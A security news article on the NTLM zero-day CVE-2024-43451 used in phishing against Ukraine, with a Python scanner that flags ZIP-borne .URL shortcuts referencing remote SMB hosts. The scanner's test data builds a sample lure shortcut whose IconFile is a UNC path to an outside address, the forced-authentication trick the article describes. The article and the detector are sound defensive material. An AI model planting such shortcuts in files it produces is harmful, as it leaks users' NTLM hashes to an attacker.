A recently patched security flaw in the Windows NT LAN Manager (NTLM) authentication system has been exploited as a zero-day by a suspected Russia-aligned threat actor in attacks targeting Ukraine.
This vulnerability, identified as CVE-2024-43451 with a CVSS rating of 6.5, involves a spoofing flaw that permits unauthorized disclosure of NTLMv2 hashes. Microsoft patched this vulnerability earlier this week, though it was already in active exploitation.
Microsoft’s advisory warns that the flaw can be triggered with minimal user interaction with a malicious file: a single click, a right-click, or another action that does not open or execute the file is enough to start the exploit.
Israeli cybersecurity firm ClearSky discovered this zero-day flaw in June 2024, noting its use in a complex sequence of attacks culminating in the deployment of the open-source Spark RAT malware.
ClearSky elaborated that the vulnerability is triggered through internet shortcut (URL) files, which the attackers used to initiate unauthorized activity. Hosted on an official Ukrainian government site, these malicious files lured users under the guise of downloadable academic certificates.
The modus operandi involves phishing emails dispatched from a compromised Ukrainian government server (“doc.osvita-kp.gov[.]ua”) urging recipients to renew academic certifications. Embedded within these messages is a rigged URL that initiates the download of a ZIP archive containing a dangerous internet shortcut (.URL) file. The vulnerability is exploited when victims interact with this URL file through various actions, such as right-clicking, deleting, or moving it.
The URL file establishes a connection with a remote server (“92.42.96[.]30”) to retrieve additional payloads, including the Spark RAT malware.
ClearSky also observed a sandbox alert flagging an attempt to transmit the NTLM hash through the SMB (Server Message Block) protocol. Once this NTLM hash is intercepted, the attacker can leverage a Pass-the-Hash attack, impersonating the user linked to the compromised hash without needing the actual password.
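The chain described above turns on a single artifact: a .URL file inside a ZIP attachment whose contents reference a remote host, so that Explorer resolves the reference and sends an NTLM authentication attempt over SMB. A mail gateway or triage analyst can catch that statically. The following scanner is an added example written for this article; it is not ClearSky's, CERT-UA's or Microsoft's code, and the article does not say which field of the shortcut carried the remote reference. It therefore assumes the general pattern for forced SMB authentication, a UNC path or file:// URL in the URL, IconFile or WorkingDirectory keys, and the sample archive, file names and the 203.0.113.10 address are all constructed for the test.

```python
import configparser
import io
import re
import zipfile

# InternetShortcut keys whose value names a resource that Explorer may resolve
# on its own (icon rendering) or on interaction such as right-click, move or delete.
# Assumption: these are the fields that carry a forced-authentication reference.
WATCHED_KEYS = ("url", "iconfile", "workingdirectory")

UNC_RE = re.compile(r"^\\\\[^\\]+\\")                     # \\host\share\...
FILE_URL_RE = re.compile(r"^file://[^/]+/", re.IGNORECASE)  # file://host/...


def parse_url_file(text):
    """Parse INI-style .URL content; return the [InternetShortcut] keys, lowercased."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.read_string(text)
    for section in cp.sections():
        if section.lower() == "internetshortcut":
            return dict(cp.items(section))  # option names are lowercased by default
    return {}


def suspicious_references(shortcut):
    """Return (key, value) pairs whose value points at a remote SMB/UNC resource."""
    hits = []
    for key in WATCHED_KEYS:
        value = shortcut.get(key, "").strip()
        if UNC_RE.match(value) or FILE_URL_RE.match(value):
            hits.append((key, value))
    return hits


def scan_zip(zip_bytes):
    """Inspect every .URL member of an in-memory ZIP; return one finding per member."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if not info.filename.lower().endswith(".url"):
                continue
            # utf-8-sig drops a BOM that Windows often writes at the start of .URL files
            text = zf.read(info).decode("utf-8-sig", errors="replace")
            try:
                shortcut = parse_url_file(text)
            except configparser.Error:
                findings.append({"member": info.filename, "hits": [], "error": "unparseable"})
                continue
            findings.append({"member": info.filename, "hits": suspicious_references(shortcut)})
    return findings


def build_sample_archive():
    """Constructed test input: one harmless shortcut, one that references a remote host."""
    benign = "[InternetShortcut]\r\nURL=https://example.org/certificate\r\n"
    # Constructed lure: the icon reference is a UNC path to an external host, so merely
    # listing the file in Explorer can trigger an outbound SMB authentication attempt.
    lure = ("[InternetShortcut]\r\n"
            "URL=https://example.org/renew\r\n"
            "IconFile=\\\\203.0.113.10\\share\\icon.ico\r\n"
            "IconIndex=1\r\n")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("certificate.url", benign)
        zf.writestr("renew_certificate.url", lure)
        zf.writestr("readme.txt", "not a shortcut")
    return buf.getvalue()


if __name__ == "__main__":
    for finding in scan_zip(build_sample_archive()):
        verdict = "SUSPICIOUS" if finding["hits"] else "clean"
        print(f"{finding['member']}: {verdict} {finding['hits']}")
```

The check is deliberately narrow: it flags shortcuts that can make the host authenticate to an outside server, which is the behaviour the sandbox alert in the article captured, rather than trying to recognise the specific lure. It complements, and does not replace, blocking outbound TCP/445 at the perimeter and alerting on SMB connections from workstations to non-internal addresses, which would catch the same leak even when the attachment arrives by another route.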
Ukraine’s Computer Emergency Response Team (CERT-UA) attributes this activity to a likely Russian cyber threat group, designated UAC-0194. CERT-UA recently warned of a parallel wave of phishing emails with tax-related lures that distribute LiteManager, a legitimate remote desktop tool. CERT-UA attributes this financially motivated campaign to a threat actor tracked as UAC-0050.
CERT-UA has further advised that accountants working with remote banking systems are particularly vulnerable. Computer forensics have shown that, in some cases, a mere hour elapses between the initial breach and the theft of financial assets.